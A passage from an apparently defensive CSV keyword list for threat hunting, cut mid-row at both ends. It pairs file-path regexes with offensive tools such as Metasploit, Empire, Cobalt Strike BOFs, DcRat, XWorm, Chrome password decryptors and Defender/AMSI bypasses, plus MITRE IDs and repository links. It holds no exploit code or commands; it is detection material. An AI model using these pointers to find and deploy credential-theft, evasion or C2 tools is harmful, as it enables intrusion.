and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/data/empire.db*",".{0,1000}\/data\/empire\.db.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/data/exploits/*",".{0,1000}\/data\/exploits\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/data/nxc.conf*",".{0,1000}\/data\/nxc\.conf.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/data/shellcode*",".{0,1000}\/data\/shellcode.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/DataBouncing.git*",".{0,1000}\/DataBouncing\.git.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/DavRelayUp.git*",".{0,1000}\/DavRelayUp\.git.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*/DavRelayUp/*",".{0,1000}\/DavRelayUp\/.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*/daytime.nse*",".{0,1000}\/daytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dazzleUP.git*",".{0,1000}\/dazzleUP\.git.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*/db2_default_userpass.txt*",".{0,1000}\/db2_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/db2-das-info.nse*",".{0,1000}\/db2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dbc2Loader*",".{0,1000}\/dbc2Loader.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/DBC-Server.py*",".{0,1000}\/DBC\-Server\.py.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*/dbms/fingerprint.py*",".{0,1000}\/dbms\/fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform 
python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/dbsclrxcvg/b.js*",".{0,1000}\/dbsclrxcvg\/b\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*/DCOM Lateral Movement/*",".{0,1000}\/DCOM\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" 
"*/dcomhijack.git*",".{0,1000}\/dcomhijack\.git.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*/DCOMPotato.git*",".{0,1000}\/DCOMPotato\.git.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*/DcRat.git*",".{0,1000}\/DcRat\.git.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/DcRat.sln*",".{0,1000}\/DcRat\.sln.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/dcrypt.exe*",".{0,1000}\/dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*/dcrypt_setup.exe*",".{0,1000}\/dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 
","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*/dcshadow.html*",".{0,1000}\/dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/dcsync_*.txt",".{0,1000}\/dcsync_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/DDSpoof.git*",".{0,1000}\/DDSpoof\.git.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*/ddspoof.py*",".{0,1000}\/ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*/deadPool.ps1*",".{0,1000}\/deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data 
Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/DeathStar/DeathStar.py*",".{0,1000}\/DeathStar\/DeathStar\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/deb.parrot.sh/*",".{0,1000}\/deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/debian/dns2tcp*",".{0,1000}\/debian\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/DebugAmsi.git*",".{0,1000}\/DebugAmsi\.git.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" 
"*/decrypt-chrome-passwords*",".{0,1000}\/decrypt\-chrome\-passwords.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","8","765","169","2024-02-08T20:07:35Z","2020-12-28T15:11:12Z" "*/decrypted.dmp*",".{0,1000}\/decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/deepce.sh *--install*",".{0,1000}\/deepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/deepce.sh*",".{0,1000}\/deepce\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for 
persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/defanger.go*",".{0,1000}\/defanger\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/DefaultCreds_db.json*",".{0,1000}\/DefaultCreds_db\.json.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/Defeat-Defender-V1.2.0.git*",".{0,1000}\/Defeat\-Defender\-V1\.2\.0\.git.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/defender-exclusions/*defender*",".{0,1000}\/defender\-exclusions\/.{0,1000}defender.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/defender-exclusions/*exclusion*",".{0,1000}\/defender\-exclusions\/.{0,1000}exclusion.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Defense_Evasion.sh*",".{0,1000}\/Defense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" 
"*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*/DeleteWD.dll*",".{0,1000}\/DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/deluge-rpc-brute.nse*",".{0,1000}\/deluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dementor.py*",".{0,1000}\/dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/demiguise.py*",".{0,1000}\/demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*/demo_bof.c*",".{0,1000}\/demo_bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 